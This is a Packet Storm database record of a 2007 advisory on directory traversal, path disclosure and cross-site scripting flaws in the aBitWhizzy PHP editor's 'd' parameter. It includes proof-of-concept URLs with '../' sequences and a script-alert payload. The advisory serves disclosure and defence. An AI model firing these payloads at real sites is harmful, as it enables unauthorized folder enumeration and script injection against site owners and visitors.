{"type": "packetstorm", "published": "2007-03-29T00:00:00", "reporter": "Lostmon", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "2cf922f582f73fe4fc69a5e61cd6d0ab"}, {"key": "modified", "hash": "f03af4995d9712b4d1a3b397db41a558"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "f03af4995d9712b4d1a3b397db41a558"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3e185b1875e415838556ecb532deffa0"}, {"key": "sourceData", "hash": "a80c590225e29483697007ae0336b3e9"}, {"key": "sourceHref", "hash": "8f706e35c7eefa01ccad7ebb0c45bb76"}, {"key": "title", "hash": "c9fbcf1797deb15054c1b03199658d1f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`################################################ \naBitWhizzy traversal folder enumeration and XSS \nvendor url: http://www.unverse.net/abitwhizzy/ \nAdvisore:http://lostmon.blogspot.com/2007/03/ \nabitwhizzy-traversal-folder-enumeration.html \nvendor notify:YES exploit include:YES \n################################################ \n \naBitWhizzy is a php script that uses whizzywig.js to create \nand edit web pages through a WYSIWYG interface, right through \nyour browser. Now your site can be updated by people with no \nknowledge of HTML, FTP or AIG (Abbreviations In General). \n \naBitWhizzy contains a flaw that allows a remote traversal \narbitrary folder enumeration.This flaw exists because the \napplication does not validate 'd' variable upon submission \nto 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and \n'whizzery/whizzylink.php' scripts.This could allow a \nremote users to create a specially crafted URL that would \nexecute '../' directory traversal characters to view folder \nstructure on the target system with the privileges \nof the target web service. \n \nThis input validation error permits too Cross-site scripting \nStyle attacks and full path disclosure. \n \n################### \nVERSIONS \n################### \n \nUnknow version of aBitWhizzy \n \n################## \nSOLUTION \n################## \n \nNo solutions was available at this time !! \n \n###################### \nTIMELINE \n###################### \n \ndiscovered:25-03-2007 \nvendor notify:25-03-2007 \nvendor response:--------- \nPrivate Disclosure:25-03-2007 \npublic disclosure:27-03-2007 \n \n####################### \nExamples \n####################### \n \nPath disclosure: \n \nhttp://localhost/abitwhizzy/whizzylink.php?d=' \nhttp://localhost/abitwhizzy/whizzypic.php?d=' \nhttp://localhost/abitwhizzy/whizzery/whizzypic.php?d=' \nhttp://localhost/abitwhizzy/whizzery/whizzylink.php?d=' \n \nFolder enumeration: \n \n \nhttp://localhost/abitwhizzy/whizzylink.php?d= \n../../../../../../../Documents%20and%20Settings \n \nhttp://localhost/abitwhizzy/whizzypic.php?d= \n../../../../../../../Documents%20and%20Settings \n \nhttp://localhost/abitwhizzy/whizzery/whizzypic.php?d= \n/../../../../../../../Documents%20and%20Settings \n \nhttp://localhost/abitwhizzy/whizzery/whizzylink.php?d= \n/../../../../../../../Documents%20and%20Settings \n \n \nCross Site Scripting: \n \nhttp://localhost/abitwhizzy/whizzery/whizzypic.php?d= \n/../../../../../../../Documents%20and%20Settings \n\"><SCRIPT>alert('XSS')</SCRIPT> \n \n \nhttp://localhost/abitwhizzy/whizzery/whizzylink.php?d= \n/../../../../../../../Documents%20and%20Settings \n\"><SCRIPT>alert('XSS')</SCRIPT> \n \n \nhttp://localhost/abitwhizzy/whizzypic.php?d= \n../../../../../../../Documents%20and%20Settings \n\"><SCRIPT>alert('XSS')</SCRIPT> \n \n \nhttp://localhost/abitwhizzy/whizzylink.php?d= \n../../../../../../../Documents%20and%20Settings \n\"><SCRIPT>alert('XSS')</SCRIPT> \n \n \n########################### \u0080nd ################################### \n \nThnx to estrella Que te ailoviuu un monton ;P \nThnx to all Lostmon\u00b4s Group Team \n \n-- \natentamente: \nLostmon (lostmon@gmail.com) \nWeb-Blog: http://lostmon.blogspot.com/ \nGoogle group: http://groups.google.com/group/lostmon (new) \n-- \nLa curiosidad es lo que hace mover la mente.... \n \n \n \n-- \natentamente: \nLostmon (lostmon@gmail.com) \nWeb-Blog: http://lostmon.blogspot.com/ \nGoogle group: http://groups.google.com/group/lostmon (new) \n-- \nLa curiosidad es lo que hace mover la mente.... \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:24:01", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/55452/abitwhizzy-traverse.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/55452/abitwhizzy-traverse.txt", "title": "abitwhizzy-traverse.txt", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "vulnersScore": 6.8}, "references": [], "id": "PACKETSTORM:55452", "hash": "f29536ee3799e133aa2cb8d523bce475f4d27d0ae6b21525dd8f721b6ff419ab", "edition": 1, "cvelist": [], "modified": "2007-03-29T00:00:00", "description": ""}

{}